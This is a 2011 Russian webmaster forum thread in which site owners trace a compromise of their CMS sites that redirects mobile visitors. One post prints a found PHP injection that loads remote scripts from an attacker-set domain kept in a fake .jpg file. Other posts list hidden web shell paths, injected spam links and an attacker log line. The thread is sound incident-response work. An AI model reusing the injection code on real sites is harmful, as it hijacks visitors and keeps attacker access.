с мобильной трубки невозможно зайти на сайт, перекидывает на другой сайт

Предыдущая
1
2
3
4
Следующая
Показаны 16-30 из 47

#16 3 декабря 2011 в 14:11

Один код нашла в template, который запрашивает USER_AGENT.

Katerina, можно пример посмотреть, что у себя проверить?

#17 3 декабря 2011 в 14:23

<?php
foreach ($ar_s = array('/NT/i','/SV1/i') as $a_r) {
    if (@preg_match($a_r,@$_SERVER['HTTP_USER_AGENT'])) {
        if(@$_COOKIE['pplicookie'] != 'presscookie') {
           @$doma_in = @file_get_contents('/var/www/p[b]имя сайта[/b]/data/www/[b]имя сайта[/b].ru/upload/117.jpg');
            if (@$doma_in && @strlen(@$doma_in)>5) {
            echo"<link rel='stylesheet'type='text/css'href=http://$doma_in/counter/init.css?v=".@mt_rand()."/><script type='text/javascript'src=http://$doma_in/counter/init.js?v=".@mt_rand()."></script>";
            @SetCookie("pplicookie","presscookie",@time()+172800);}}break;}}
            if (@$_COOKIE['hphpallcookie']) {
    @file_put_contents  ('/var/www/p[b]имя сайта[/b]/data/www/[b]имя сайта[/b].ru/upload/117.jpg',@$_COOKIE['hphpallcookie']);    
}
?>

У меня такого раньше не было (могу ошибаться).
Я не знаю, что это такое… Там же узнала про картинку 117.

#18 3 декабря 2011 в 15:17

ищите новые файлы с момента предполагаемого взлома и измененные файлы. у вас точно есть доступ со стороны к файловой системе, раз коды внедряют. чистки не помогут, удалите код, но шелл то остался и вопрос времени когда он появится снова.

зайдите в логи сервера и сделайте поиск по имени файла в котором эти изменения.надо узнать с какого айпи он запрашивался. далее искать какие еще файлы запрашивались с этого айпи и есть вероятность что увидете через что был вход. а если ломал школоло и работал с одной прокси, то по истории увидите и способ как он загрузил шелл.

я cделал тиц 20 за 300р в месяц / 15$ в день ничего не делая / почему контекст лучше тизеров

Сегодня в 00:02

#19 3 декабря 2011 в 16:52

у себя template такого не нашел
вот такое
----------------

<a href="://.ru/components/cats/viewforum-2-1.html">Кряки</a><br>
<ul>
<a href="://.ru/components/cats/viewtopic-729529.html">Nero 7 11 10 0 серийный номер</a><br>
<a href="://.ru/components/cats/viewtopic-369376.html">Creck бесплатно Alcohol120 retail 1 9 8 7612</a><br>
<a href="://.ru/components/cats/viewtopic-44641.html">Crack 401111</a><br>
<a href="://.ru/components/cats/viewtopic-38178.html">Драйвера ati radeon x 300 x550 x1050</a><br>
<a href="://.ru/components/cats/viewtopic-224401.html">Алкоголь 120 с кряком</a><br>
<a href="://.ru/components/cats/viewtopic-122677.html">Divinity 2 русификатор звука</a><br>
<a href="://.ru/components/cats/viewtopic-808205.html">ITE IT8212 ATA RAID Controller win7</a><br>
<a href="://.ru/components/cats/viewtopic-101149.html">Драйвера бесплатно xerox phaser 3117</a><br>
<a href="://.ru/components/cats/viewtopic-744192.html">Дрова на Nokia 5300</a><br>
<a href="://.ru/components/cats/viewtopic-139094.html">Кодеки на wmp xp mp4</a><br>
<a href="://.ru/components/cats/viewtopic-936116.html">Качай ACID Pro</a><br>

#20 3 декабря 2011 в 19:21

Буквально на днях получил письмо:

-------------------------------
Добрый день. Мы хотим предложить для вашего сайта **********.com получить дополнительную ежедневную прибыль в партнерской системе ******.ru
В среднем ваш сайт посещает 600 пользователей в сутки, 5-10% из которых заходят с мобильных телефонов.
Мобильные посетители практически бесполезны для веб-сайта — они не качают файлы и не кликают на рекламу. Монетизировать их в рамках веб-сайта довольно сложно.
Мы готовы оплачивать данный тип трафика и перенаправлять его тематическим рекламодателям в сфере мобильного интернета. По нашим расчетам, дополнительный доход от Вашего сайта при текущей посещаемости составит около 36 руб. в день!
Преимущества работы с нами:

— Мы выкупаем мобильных пользователей абсолютно всех стран на самых выгодных условиях, благодаря сотрудничеству с крупнейшими рекламодателями
— Никакой рекламы и ссылок на Вашем сайте. Код всего-лишь перенаправляет мобильных пользователей. При этом он полностью безопасен для поисковых систем
— Еженедельные автоматические выплаты на WebMoney без задержек. Досрочные выплаты тоже возможны
— Детальная статистика выкупленного трафика
— Простая установка кода, которая занимает не более 30 секунд
— Отзывчивая техническая поддержка
-------------------------------

Уже и сервисы скупки такого трафика существуют.

#21 3 декабря 2011 в 20:40

от сервисов и идет пляска. поинтересуйся сколько счас рубят люди на мобильном трафе, хотя бы на той же опере мини😊другое дело что находятся уроды которые предпочитают украсть чужой траффик.

я cделал тиц 20 за 300р в месяц / 15$ в день ничего не делая / почему контекст лучше тизеров

#22 3 декабря 2011 в 20:42

Нашли шелл в cgi-bin — Файл test.pl

#23 3 декабря 2011 в 21:01

я счас у lezginka.ru, фтп глянул. там вообще ахтунг. у него не только шелл в /includes/smarty/libs/fcuk но и еще куча страниц. вообще он и не знал что у него там дорвей. там же и файлик c шеллом. жаль пока нет доступа к логам сервера глянуть чего там еще интересного :)

я cделал тиц 20 за 300р в месяц / 15$ в день ничего не делая / почему контекст лучше тизеров

#24 3 декабря 2011 в 21:02

И о поиске по времени изменения: дата создания файла была выставлена на 2010, хотя при сравнении полных бэкапов выяснилось, что появился этот файл в ноябре 2011, так что поиск по дате изменения был бы бесполезен.

#25 3 декабря 2011 в 21:09

/wysiwyg/editor/images/metadata.jpg — еще один шелл. причем ему ничерта не мешает выполнится. там внутри php

похоже что взломы идут через дырявый fckeditor буть он неладен.

файл загружен 27 января этого года. были какие-то исправления безопасности с того времени связанные редактором? я так понимаю это еще на 1.7 версии его подгрузии. а вот первый найденый шелл тот от июня месяца, то-есть уже на 1.8 версии. но тут не факт что смарти виноват, так как вроде он на последней стабильной версии своей ветки.

я cделал тиц 20 за 300р в месяц / 15$ в день ничего не делая / почему контекст лучше тизеров

#26 3 декабря 2011 в 21:10

picaboo, прав
у меня они оказывается давно сидят, я уже начинал чувствовать себя в гостях :)
яндекс сам меня предупредил и потом только я проверил

#27 3 декабря 2011 в 21:16

а вот и сам виноват:). кто так обновляет движок. весь, пардон, срач от старого остался. дырка в визивинге? — дык он там лежит от 2009 года. ясен пень что там дыр куча и все в паблике. другое дело что двиг уже не использует эту папку и её надо было грохнуть, а не держать на сервере потенциальную угрозу

я cделал тиц 20 за 300р в месяц / 15$ в день ничего не делая / почему контекст лучше тизеров

#28 3 декабря 2011 в 21:23

да тут походу драка целая :)))

третий шел.
28/10/10 russian.php в папке languages

я cделал тиц 20 за 300р в месяц / 15$ в день ничего не делая / почему контекст лучше тизеров

#29 3 декабря 2011 в 22:21

подвожу промежуточный итог взлома, через шелл:

/wysiwyg/editor/images/metadata.jpg — еще один шелл.

28/10/10 russian.php в папке languages

Нашли шелл в cgi-bin — Файл test.pl

/includes/smarty/libs/fcuk

#30 5 декабря 2011 в 22:58

ну собственно вчера попался засранец.

Line 11025: 94.228.220.68 — - [04/Dec/2011:22:42:22 +0400] "GET /upload/userfiles/211/hey.php HTTP/1.0" 200 145901
грузанул через профиль файлик и пошел шастать по системе.

какой вывод? а вывод один — если у вас стоит версия 1.8, сходите в магазин и купите ченить к чаю — гости к вам часто будут ходить glasses